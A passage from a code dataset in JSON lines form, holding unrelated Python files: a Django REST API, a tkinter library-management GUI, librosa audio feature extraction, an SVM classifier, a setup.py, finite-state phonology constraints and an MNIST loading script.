except Exception as e:\n ml.logger.error('%s: %s: %s' % (from_email, subject, str(e)))\n finally:\n # 主题邮件全部标记为已读\n mail.mark('Seen')\n box.logout()\n\n\n\n\n","sub_path":"myworkflows/mails.py","file_name":"mails.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"433077315","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/7/8 00:21\n# @Author : 赵在化\n# @email : zaihuazhao@163.com\n# @File : api.py\nfrom rest_framework import generics\nfrom rest_framework.permissions import IsAuthenticated\nfrom apps.problems.models import ProbelmTemp, ChapterTemp\nfrom apps.problems.serializers import ProblemTempDetailListSerailizer, ChapterTempListSerializer, \\\n ProblemExamListSerializer\nfrom extensions.pagination import StandardResultsSetPagination\n\n\nclass ProblemTempListApi(generics.ListAPIView):\n \"\"\"题目列表\"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = ProblemTempDetailListSerailizer\n pagination_class = StandardResultsSetPagination\n\n def get_queryset(self):\n # course = self.request.user.choices\n course = self.request.user.course.num\n \n level = int(self.request.query_params.get('level', 0))\n chapter = int(self.request.query_params.get('chapter', 0))\n category = self.request.query_params.get('category')\n # filer_params = {'course': course, 'chapter': chapter, 'level': level}\n filer_params = {'course': course, 'chapter': chapter}\n\n if category:\n filer_params['category'] = int(category)\n\n return ProbelmTemp.objects.filter(**filer_params).order_by('id')\n\n\nclass ChapterTempListApi(generics.ListAPIView):\n \"\"\"章节列表\"\"\"\n\n permission_classes = (IsAuthenticated,)\n serializer_class = ChapterTempListSerializer\n\n def get_queryset(self):\n # course = self.request.user.choices\n course = self.request.user.course.num\n # level = int(self.request.query_params.get('level', 0))\n # return ChapterTemp.objects.filter(course=course, level=level).order_by('id')\n return ChapterTemp.objects.filter(course=course).order_by('id')\n\n\n\nclass ProblemDetailApi(generics.RetrieveAPIView):\n \"\"\"获取单个题目\"\"\"\n\n permission_classes = (IsAuthenticated,)\n serializer_class = ProblemExamListSerializer\n\n def get_queryset(self):\n return ProbelmTemp.objects.all()\n","sub_path":"apps/problems/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"70036760","text":"from tkinter import*\r\nimport tkinter.messagebox\r\n#import LibBksDatabase\r\n\r\n\r\nclass Library:\r\n def __init__(self,root):\r\n \r\n self.root = root\r\n self.root.title(\"Library Database Management System\")\r\n self.root.geometry(\"1350x750+0+0\")\r\n\r\n\r\n MTy = StringVar()\r\n Ref = StringVar()\r\n Tit = StringVar()\r\n fna = StringVar()\r\n sna = StringVar()\r\n Adr1 = StringVar()\r\n Adr2 = StringVar()\r\n pcd = StringVar()\r\n MNo = StringVar()\r\n BkID = StringVar()\r\n Bkt = StringVar()\r\n BkT = StringVar()\r\n Atr = StringVar()\r\n DBo = StringVar()\r\n Ddu = StringVar()\r\n sPr = StringVar()\r\n LrF = StringVar()\r\n DoD = StringVar()\r\n DonL = StringVar()\r\n\r\n \r\n #=======================================FN declareation=====================================\r\n def iExit():\r\n iExit = tkinter.messagebox.askyesno(\"Library Database Management System\",\r\n \"Confirm if you want to Exit\")\r\n if iExit > 0:\r\n root.destroy()\r\n return\r\n\r\n def ClaearData():\r\n self.txtMType.delete(0,END)\r\n self.txtBkID.delete(0,END)\r\n self.txtRef.delete(0,END)\r\n self.txtTit.delete(0,END)\r\n self.txtfna.delete(0,END)\r\n self.txtsna.delete(0,END)\r\n self.txtAdr1.delete(0,END)\r\n self.txtAdr2.delete(0,END)\r\n self.txtpcd.delete(0,END)\r\n self.txtMNo.delete(0,END)\r\n self.txtBkID.delete(0,END)\r\n self.txtBkt.delete(0,END)\r\n self.txtAtr.delete(0,END)\r\n self.txtDBo.delete(0,END)\r\n self.txtDdu.delete(0,END)\r\n self.txtsPr.delete(0,END)\r\n self.txtLrF.delete(0,END)\r\n self.txtDoD.delete(0,END)\r\n self.txtDonL.delete(0,END)\r\n\r\n def addData():\r\n if(len(MTy.get())!=0):\r\n LibBksDatabase.addDataRec(MTy.get(), Ref.get(), Tit.get(), fna.get(),sna.get(),Adr1.get(),Adr2.get(),pcd.get(),MNo.get(),BkID.get(),\r\n Bkt.get(),MType.get(),BkT.get(), Atr.get(),DBo.get(),Ddu.get(),sPr.get(),LrF.get(),DoD.get(),DonL.get())\r\n booklist.delete(0,END)\r\n booklist.insert(END,(MTy.get(), Ref.get(), Tit.get(), fna.get(),sna.get(),Adr1.get(),Adr2.get(),pcd.get(),MNo.get(),BkID.get(),\r\n Bkt.get(),MType.get(),BkT.get(), Atr.get(),DBo.get(),Ddu.get(),sPr.get(),LrF.get(),DoD.get(),DonL.get()))\r\n \r\n \r\n\r\n\r\n \r\n #=======================================FRAMES=====================================\r\n MainFrame = Frame(self.root)\r\n MainFrame.grid()\r\n\r\n TitFrame = Frame(MainFrame, bd=2, padx = 40, pady=8, bg=\"Cadet blue\", relief = RIDGE)\r\n TitFrame.pack(side = TOP)\r\n\r\n self.lblTit = Label(TitFrame, font=('arial',46,'bold'),text=\"Library Database Management System\")\r\n self.lblTit.grid(sticky=W)\r\n\r\n ButtonFrame = Frame(MainFrame, bd = 2, width=1350, height = 100, padx=20, bg = \"Cadet Blue\",relief=RIDGE)\r\n ButtonFrame.pack(side=BOTTOM)\r\n\r\n FrameDetail = Frame(MainFrame, bd=0, width=1350, height = 50, padx=20, relief=RIDGE)\r\n FrameDetail.pack(side=BOTTOM)\r\n\r\n DataFrame = Frame(MainFrame, bd=1, width = 1300, height = 400, padx=20, pady=20, relief=RIDGE)\r\n DataFrame.pack(side=BOTTOM)\r\n\r\n DataFrameLEFT = LabelFrame(DataFrame, bd=1, width = 800 , height = 300, padx=20, relief=RIDGE, font=('arial',12,'bold'), text=\"Library Management Info:\",bg=\"Cadet Blue\")\r\n DataFrameLEFT.pack(side=LEFT)\r\n\r\n DataFrameRIGHT = LabelFrame(DataFrame, bd=1, width = 450, height = 300, padx=20, pady=3, relief=RIDGE,font=('arial',12,'bold'),bg=\"Cadet Blue\",text=\"Book Details:\")\r\n DataFrameRIGHT.pack(side=RIGHT)\r\n\r\n \r\n #=======================================LABLES and Entry=====================================\r\n self.lblMemberType = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Member Type\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblMemberType.grid(row=0, column=0,sticky=W)\r\n self.txtMType = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable=MTy,width=25)\r\n self.txtMType.grid(row=0, column=1)\r\n\r\n self.lblBkID = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"BOOK ID\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblBkID.grid(row=0, column=2,sticky=W)\r\n self.txtBkID = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable=BkID,width=25)\r\n self.txtBkID.grid(row=0, column=3)\r\n\r\n self.lblRef = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Refrence No:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblRef.grid(row=1, column=0,sticky=W)\r\n self.txtRef = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable=Ref,width=25)\r\n self.txtRef.grid(row=1, column=1)\r\n\r\n self.lblBkt = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Book Title:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblBkt.grid(row=1, column=2,sticky=W)\r\n self.txtBkt = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Bkt,width=25)\r\n self.txtBkt.grid(row=1, column=3)\r\n\r\n self.lblTit = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Title:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblTit.grid(row=2, column=0,sticky=W)\r\n self.txtTit = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Tit,width=25)\r\n self.txtTit.grid(row=2, column=1)\r\n\r\n self.lblAtr = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Author\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblAtr.grid(row=2, column=2,sticky=W)\r\n self.txtAtr = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Atr,width=25)\r\n self.txtAtr.grid(row=2, column=3)\r\n\r\n self.lblfna = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"FirstName:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblfna.grid(row=3, column=0,sticky=W)\r\n self.txtfna = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = fna,width=25)\r\n self.txtfna.grid(row=3, column=1)\r\n\r\n \r\n self.lblDBo = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Date of Borrowed:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDBo.grid(row=3, column=2,sticky=W)\r\n self.txtDBo = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = DBo,width=25)\r\n self.txtDBo.grid(row=3, column=3)\r\n\r\n self.lblsna = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Surname:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblsna.grid(row=4, column=0,sticky=W)\r\n self.txtsna = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = sna,width=25)\r\n self.txtsna.grid(row=4, column=1)\r\n\r\n self.lblDdu = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Due Date\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDdu.grid(row=4, column=2,sticky=W)\r\n self.txtDdu = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Ddu,width=25)\r\n self.txtDdu.grid(row=4, column=3)\r\n\r\n self.lblAdr1 = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Address1 :\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblAdr1.grid(row=5, column=0,sticky=W)\r\n self.txtAdr1 = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Adr1,width=25)\r\n self.txtAdr1.grid(row=5, column=1)\r\n\r\n self.lblDonL = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Days on Loan\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDonL.grid(row=5, column=2,sticky=W)\r\n self.txtDonL = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = DonL,width=25)\r\n self.txtDonL.grid(row=5, column=3)\r\n\r\n self.lblAdr2 = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Address2 :\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblAdr2.grid(row=6, column=0,sticky=W)\r\n self.txtAdr2 = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Adr2,width=25)\r\n self.txtAdr2.grid(row=6, column=1)\r\n\r\n self.lblLrF = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Late Return Fees\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblLrF.grid(row=6, column=2,sticky=W)\r\n self.txtLrF = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = LrF,width=25)\r\n self.txtLrF.grid(row=6, column=3)\r\n\r\n self.lblpcd = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Post Code:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblpcd.grid(row=7, column=0,sticky=W)\r\n self.txtpcd = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = pcd,width=25)\r\n self.txtpcd.grid(row=7, column=1)\r\n\r\n self.lblDoD = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Date over Due:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDoD.grid(row=7, column=2,sticky=W)\r\n self.txtDoD = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = DoD,width=25)\r\n self.txtDoD.grid(row=7, column=3)\r\n\r\n self.lblMNo = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Mobile Number:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblMNo.grid(row=8, column=0,sticky=W)\r\n self.txtMNo = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = MNo,width=25)\r\n self.txtMNo.grid(row=8, column=1)\r\n\r\n self.lblsPr = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Selling Price:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblsPr.grid(row=8, column=2,sticky=W)\r\n self.txtsPr = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = sPr,width=25)\r\n self.txtsPr.grid(row=8, column=3)\r\n #=======================================ListBoc and Scrollbar=====================================\r\n\r\n\r\n scrollbar = Scrollbar(DataFrameRIGHT)\r\n scrollbar.grid(row=0,column = 1,sticky='ns')\r\n\r\n booklist = Listbox(DataFrameRIGHT,width=45, height = 12, font=('arial',12,'bold'),yscrollcommand = scrollbar.set)\r\n booklist.grid(row=0,column = 0, padx=8)\r\n scrollbar.config(command = booklist.yview)\r\n\r\n #=======================================Buttons=====================================\r\n self.btnAddData = Button(ButtonFrame , text = \"ADD Data\", font=('arial',14,'bold'),height= 2, width = 13,bd=4,command = addData)\r\n self.btnAddData.grid(row=0,column=0)\r\n\r\n self.btnDisplayData = Button(ButtonFrame , text = \"Display Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnDisplayData.grid(row=0,column=1)\r\n\r\n self.btnClearData = Button(ButtonFrame , text = \"Clear Data\", font=('arial',14,'bold'),height= 2, width = 13,bd=4, command = ClaearData)\r\n self.btnClearData.grid(row=0,column=2)\r\n\r\n self.btnDeleteData = Button(ButtonFrame , text = \"Delete Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnDeleteData.grid(row=0,column=3)\r\n\r\n self.btnUpdateData = Button(ButtonFrame , text = \"Update Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnUpdateData.grid(row=0,column=4)\r\n\r\n self.btnSearchData = Button(ButtonFrame , text = \"Search Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnSearchData.grid(row=0,column=5)\r\n\r\n self.btnExit = Button(ButtonFrame , text = \"Exit\", font=('arial',14,'bold'),height= 2, width = 13,bd=4, command = iExit)\r\n self.btnExit.grid(row=0,column=6)\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n root = Tk()\r\n application = Library(root)\r\n root.mainloop()\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n","sub_path":"Library Management System.py","file_name":"Library Management System.py","file_ext":"py","file_size_in_byte":10993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160780388","text":"import numpy as np\nimport librosa\nimport os\nimport soundfile as sf\nimport matplotlib.pyplot as plt\n\n\"\"\"\n This file takes care of the computation of the inputs and to the saving of the results in training/testing task\n\"\"\"\n\ndef getStats(feature):\n \"\"\"\n\n :param feature: np array in 3 dimensions\n :return: the mean and the std of this array through the axis 1 and 2\n \"\"\"\n return np.array([np.mean(feature, axis=(1, 2)), np.std(feature, axis=(1, 2))])\n\ndef getAllInputs(filename):\n \"\"\"\n\n :param filename: a .wav file\n :return: the inputs (not normalized) for the neural network\n \"\"\"\n audio, sr_ = sf.read(filename) # (4800000, 2)\n left = audio[::2, 0]\n right = audio[::2, 1]\n\n # waveform - (2, 120000)\n waveform = audio.T[:, ::4]\n\n # spectrogram - (2, 1025, 469)\n spectrogram = np.abs(np.array([librosa.core.stft(left),\n librosa.core.stft(right)]))\n # rms - (2, 1, 469)\n rms = np.array([librosa.feature.rms(left), # Root Mean Square\n librosa.feature.rms(right)])\n # zcr - (2, 1, 469)\n zcr = np.array([librosa.feature.zero_crossing_rate(left), # Zero Crossing Rate\n librosa.feature.zero_crossing_rate(right)])\n # sc - (2, 1, 469)\n sc = np.array([librosa.feature.spectral_centroid(left), # Spectral Centroid\n librosa.feature.spectral_centroid(right)])\n # sr - (2, 1, 469)\n sr = np.array([librosa.feature.spectral_rolloff(left), # Spectral Roll-of\n librosa.feature.spectral_rolloff(right)])\n # sfm - (2, 1, 469)\n sfm = np.array([librosa.feature.spectral_flatness(left), # Spectral Flatness Mesure\n librosa.feature.spectral_flatness(right)])\n # mel_spectrogram - (2, 100, 469)\n n_mels = 100\n mel_spectrogram = np.array([librosa.feature.melspectrogram(y=left, sr=sr_, n_mels=n_mels), # (2, 100, 469)\n librosa.feature.melspectrogram(y=right, sr=sr_, n_mels=n_mels)])\n logmel_spectrogram = librosa.core.amplitude_to_db(mel_spectrogram)\n\n # getStats - (10,)\n stats = np.concatenate([getStats(rms), getStats(zcr),\n getStats(sc), getStats(sr), getStats(sfm)])\n #### Reshape for the neural network #####\n # Waveform\n waveform = np.reshape(waveform, (2, 120000))\n\n\n # spectrogram\n spectrogram = np.reshape(spectrogram, (2, 1025, 469)) # Not used\n\n # Features\n features = np.concatenate(\n [\n np.reshape(rms, (2, 469)),\n np.reshape(zcr, (2, 469)),\n np.reshape(sc, (2, 469)),\n np.reshape(sr, (2, 469)),\n np.reshape(sfm, (2, 469))\n ],\n axis=0\n )\n features = np.reshape(features, (10, 469))\n\n # Features mstd\n fmstd = np.reshape(stats.T, (2, 10)) # (right+left, 2 * nb_features)\n\n ##### Create datas #####\n data = (\n waveform, # (2, 120000)\n logmel_spectrogram, # (2, 1025, 469), for mel : (2, 100, 469)\n features, # (10, 469)\n fmstd # (2, 10)\n )\n\n # data = (waveform, spectrogram, rms, zcr, mel_spectrogram, stats)\n return data\n\n\n#### Function to set up the environment\n\ndef setEnviromnent():\n \"\"\"\n Creates the folders for the Generated Dataset\n \"\"\"\n if not os.path.isdir('./GeneratedDataset'):\n os.mkdir('./GeneratedDataset')\n if not os.path.isdir('./GeneratedDataset/train'):\n os.mkdir('./GeneratedDataset/train')\n if not os.path.isdir('./GeneratedDataset/test'):\n os.mkdir('./GeneratedDataset/test')\n\n\ndef setLightEnviromnent():\n \"\"\"\n Creates the folders for the Generated Dataset with a snall number of Data (for test on CPU)\n \"\"\"\n if not os.path.isdir('./GeneratedLightDataset'):\n os.mkdir('./GeneratedLightDataset')\n if not os.path.isdir('./GeneratedLightDataset/train'):\n os.mkdir('./GeneratedLightDataset/train')\n if not os.path.isdir('./GeneratedLightDataset/test'):\n os.mkdir('./GeneratedLightDataset/test')\n\n\ndef createInputParametersFile(template, fileName, dn_parameters):\n \"\"\"\n\n :param template: The template of the dictionnary input_parameters\n :param fileName: The path where we want to save it\n :param dn_parameters: the parameters of the neural network\n\n Creates the file \"fileName\" with the dictionnary input_parameters filled knowing the architecture of the\n Neural Network (known with dn_parameters)\n \"\"\"\n waveform, spectrogram, features, fmstd = getAllInputs('./Dataset/train/audio/0.wav')\n template['spectrum']['nb_channels'], template['spectrum']['h'], template['spectrum']['w'] = spectrogram.shape\n template['audio']['nb_channels'], template['audio']['len'] = waveform.shape\n template['features']['nb_channels'], template['features']['len'] = features.shape\n template['fmstd']['len'] = fmstd.shape[0] * fmstd.shape[1]\n template['final']['len'] = dn_parameters['spectrum']['size_fc'] + dn_parameters['audio']['size_fc'] + \\\n dn_parameters['features']['size_fc'] + dn_parameters['fmstd']['layers_size'][-1]\n\n np.save(fileName, template)\n\n\ndef saveFigures(folder, name, summaryDict):\n \"\"\"\n\n :param folder: the folder where we want to save it\n :param name: the name of the figures\n :param summaryDict: the data of the training we want to plot\n\n Save the plot of the evolution of the training loss and the testing loss through the epochs\n Save the plot of the evolution of the training accuracy and the testing loss accuracy the epochs\n \"\"\"\n loss_train = summaryDict['loss_train']\n loss_test = summaryDict['loss_test']\n acc_train = summaryDict['acc_train']\n acc_test = summaryDict['acc_test']\n nb_epochs = summaryDict['nb_epochs']\n best_epoch = summaryDict['best_model']['epoch']\n best_loss_train = summaryDict['best_model']['loss_train']\n best_acc_train = summaryDict['best_model']['acc_train']\n best_loss_test = summaryDict['best_model']['loss_test']\n best_acc_test = summaryDict['best_model']['acc_test']\n\n min_loss = min(min(loss_train), min(loss_test))\n max_loss = max(max(loss_train), max(loss_test))\n min_acc = min(min(acc_train), min(acc_test))\n max_acc = max(max(acc_train), max(acc_test))\n\n x = np.arange(1, nb_epochs + 1)\n # Save of the loss\n plt.figure()\n plt.plot(x, loss_train, 'steelblue', label='Training Loss')\n plt.plot(x, loss_test, 'darkorange', label='Testing Loss')\n plt.title('Variation of the Loss through the epochs\\n' + name)\n plt.xlabel('Epoch')\n plt.ylabel('Loss value')\n plt.plot([1, nb_epochs], [best_loss_train, best_loss_train], 'steelblue', linestyle='--',\n label='Model training loss : {0}'.format(round(best_loss_train, 4)))\n plt.plot([1, nb_epochs], [best_loss_test, best_loss_test], color='darkorange', linestyle='--',\n label='Model testing loss : {0}'.format(round(best_loss_test, 4)))\n plt.plot([best_epoch, best_epoch], [min_loss, max_loss], color='dimgray', linestyle='--',\n label='Best Epoch : {0}'.format(best_epoch))\n plt.legend()\n plt.grid()\n plt.savefig(os.path.join(folder, 'LossFigure_' + name + '.png'))\n\n # Save the accuracy\n plt.figure()\n plt.plot(x, acc_train, 'steelblue', label='Training Accuracy')\n plt.plot(x, acc_test, 'darkorange', label='Testing Accuracy')\n plt.title('Variation of the Accuracy through the epochs\\n' + name)\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy value (%)')\n plt.plot([1, nb_epochs], [best_acc_train, best_acc_train], color='steelblue', linestyle='--',\n label='Model train accuracy : {0}'.format(round(best_acc_train, 2)))\n plt.plot([1, nb_epochs], [best_acc_test, best_acc_test], color='darkorange', linestyle='--',\n label='Model test accuracy : {0}'.format(round(best_acc_test, 2)))\n plt.plot([best_epoch, best_epoch], [min_acc, max_acc], color='dimgray', linestyle='--',\n label='Best Epoch : {0}'.format(best_epoch))\n plt.legend()\n plt.grid()\n plt.savefig(os.path.join(folder, 'AccuracyFigure_' + name + '.png'))\n\n\ndef saveText(folder, name, summaryDict):\n \"\"\"\n\n :param folder: the folder where we want to save it\n :param name: the name of the figures\n :param summaryDict: the data of the training we want to plot\n\n Save a text file which summarize the saved model\n \"\"\"\n loss_train = summaryDict['best_model']['loss_train']\n loss_test = summaryDict['best_model']['loss_test']\n acc_train = summaryDict['best_model']['acc_train']\n acc_test = summaryDict['best_model']['acc_test']\n nb_epochs = summaryDict['nb_epochs']\n best_epoch = summaryDict['best_model']['epoch']\n input_used = summaryDict['inputs_used']\n\n iu_txt = ''\n flag = False\n if input_used[0] == '1':\n iu_txt += 'waveform'\n flag = True\n if input_used[1] == '1':\n if flag:\n iu_txt += ', spectrogram'\n else:\n iu_txt += 'spectrogram'\n flag = True\n if input_used[2] == '1':\n if flag:\n iu_txt += ', features'\n else:\n iu_txt += 'features'\n flag = True\n if input_used[3] == '1':\n if flag:\n iu_txt += ', fmstd'\n else:\n iu_txt += 'fmstd'\n flag = True\n\n text = 'Summary of {5} :\\n\\n' \\\n 'Training Loss : {0}\\n' \\\n 'Testing Loss : {1}\\n' \\\n 'Training Accuracy : {2}\\n' \\\n 'Testing Accuracy : {3}\\n' \\\n 'Train Epochs : {4}\\n' \\\n 'Best Epoch : {8}\\n\\n' \\\n 'Inputs Used : {7}\\t ({6})'\\\n .format(\n loss_train, loss_test, acc_train, acc_test, nb_epochs, name, iu_txt, input_used, best_epoch\n )\n\n with open(os.path.join(folder, 'Summary_' + name + '.txt'), 'a') as f:\n f.write(text)\n\n\n","sub_path":"DataGeneration/inputGeneration.py","file_name":"inputGeneration.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"621509013","text":"# coding=utf-8\nimport unittest\n\nimport easygui\n\nfrom ybckit.gui import init as gui_init\nfrom . import ybc_env\n\n\nclass GuiTestCase(unittest.TestCase):\n\n def setUp(self):\n super(GuiTestCase, self).setUp()\n ybc_env.setup()\n gui_init()\n\n def tearDown(self):\n super(GuiTestCase, self).tearDown()\n ybc_env.cleanup()\n\n @unittest.skip('仅限本地运行,需要手动检查 /tmp/request 内容')\n def test_gui(self):\n easygui.buttonbox(msg=\"hello world!\")\n\n self.assertTrue(True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_gui.py","file_name":"test_gui.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"12219076","text":"##knn implementation\n\n\nimport numpy as np\nfrom sklearn import preprocessing, cross_validation, neighbors, svm\nimport pandas as pd\n\ndataset=pd.read_csv('Audio.csv')\n\n#knn handel bad for outliers if we don't remove id col.\n\ndataset.drop(['Song Id','Song','name_of_song'],1,inplace=True)\n\nx=np.array(dataset.drop(['final algo'],1))\ny=np.array(dataset['final algo'])\n\n# print(x[0])\n# print(x[:-5])\n#test=pd.read_csv('test.csv')\n\n#knn handel bad for outliers if we don't remove id col.\n\n# test.drop(['id','name'],1,inplace=True)\n\n\n# x_test=np.array(test.drop(['class'],1))\n# y_test=np.array(test['class'])\n\n\nx_train,x_test,y_train,y_test=cross_validation.train_test_split(x,y,test_size=0.4)\n\n\n#classifier\nclf=svm.SVC()\nclf.fit(x_train,y_train)\n\n#accuracy measure\naccuracy=clf.score(x_test,y_test)\nprint('accuracy using svm is:')\nprint(accuracy)\n\n\n\n# example_measure=np.array([7.782763354,2903.467941,21.66916186,6330.903385,2788.875991,89.10290948,9.171683311])\n# example_measure=example_measure.reshape(1,-1)\n\n# prediction=clf.predict(example_measure)\n# print(prediction)","sub_path":"scripts/Audio/audio_classifier_svm.py","file_name":"audio_classifier_svm.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"206663933","text":"# -*- coding: utf-8 -*-\n#\n# setup.py\n# drakeutil\n#\n\n\"\"\"\nPackaging for drakeutil module.\n\"\"\"\n\nfrom setuptools import setup\n\nVERSION = '0.1.0'\n\nrequires = [\n 'python-datetime-tz>=0.2',\n 'python-dateutil>=1.5',\n 'pytz>=2012j',\n ]\n\nsetup(\n name='drakeutil',\n description=\"Python helpers for the drake workflow language\",\n long_description=open('README.rst').read(),\n url=\"http://bitbucket.org/larsyencken/drakeutil/\",\n version=VERSION,\n author=\"Lars Yencken\",\n author_email=\"lars@yencken.org\",\n license=\"ISC\",\n packages=[\n 'drakeutil',\n ],\n install_requires=requires,\n extras_require={\n 'mysql': ['MySQL-python>=1.2.3'],\n }\n )\n","sub_path":"pypi_install_script/drakeutil-0.1.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"296048668","text":"from machines import Eval\n\n\"\"\" Faithfulness Constraints \"\"\"\n\n\ndef dep():\n dep = Eval()\n dep.set_states({\"dep\"})\n dep.set_alphabet({\"a\", \"b\"})\n dep.set_start(\"dep\")\n dep.add_final(\"dep\")\n dep.add_arc(\"dep\", \"\", \"a\", (1,), \"dep\")\n dep.add_arc(\"dep\", \"\", \"b\", (1,), \"dep\")\n dep.add_arc(\"dep\", \"a\", \"\", (0,), \"dep\")\n dep.add_arc(\"dep\", \"b\", \"\", (0,), \"dep\")\n dep.add_arc(\"dep\", \"a\", \"a\", (0,), \"dep\")\n dep.add_arc(\"dep\", \"b\", \"b\", (0,), \"dep\")\n\n return dep\n\n\ndef max():\n max = Eval()\n max.set_states({\"max\"})\n max.set_alphabet({\"a\", \"b\"})\n max.set_start(\"max\")\n max.add_final(\"max\")\n max.add_arc(\"max\", \"\", \"a\", (0,), \"max\")\n max.add_arc(\"max\", \"\", \"b\", (0,), \"max\")\n max.add_arc(\"max\", \"a\", \"\", (1,), \"max\")\n max.add_arc(\"max\", \"b\", \"\", (1,), \"max\")\n max.add_arc(\"max\", \"a\", \"a\", (0,), \"max\")\n max.add_arc(\"max\", \"b\", \"b\", (0,), \"max\")\n\n return max\n\n\n\"\"\" Markedness Constraints \"\"\"\n\n\ndef cc():\n cc = Eval()\n cc.set_states({\"cc0\", \"cc1\"})\n cc.set_alphabet({\"a\", \"b\"})\n cc.set_start(\"cc0\")\n cc.add_final(\"cc0\")\n cc.add_final(\"cc1\")\n cc.add_arc(\"cc0\", \"*\", \"a\", (0,), \"cc0\")\n cc.add_arc(\"cc0\", \"*\", \"b\", (0,), \"cc1\")\n cc.add_arc(\"cc0\", \"*\", \"\", (0,), \"cc0\")\n cc.add_arc(\"cc1\", \"*\", \"b\", (1,), \"cc1\")\n cc.add_arc(\"cc1\", \"*\", \"a\", (0,), \"cc0\")\n cc.add_arc(\"cc1\", \"*\", \"\", (0,), \"cc1\")\n\n return cc\n","sub_path":"constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"113131088","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nfrom sklearn import preprocessing\n\nmnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\n\n\nTrain_image = mnist.train.images\ny_train = mnist.train.labels\n\nTest_image = mnist.test.images\ny_test = mnist.test.labels\n\nAll_image = np.load('All_image_DR_skewed.npy')\n\nx_max = np.max(All_image)\nx_min = np.min(All_image)\n\nAll_image = (1/16*x_max*(All_image-x_min))/(x_max-x_min)\n\nx_train = All_image[0:55000]\nx_test = All_image[55000:65000]\n\n_, M_train_label = 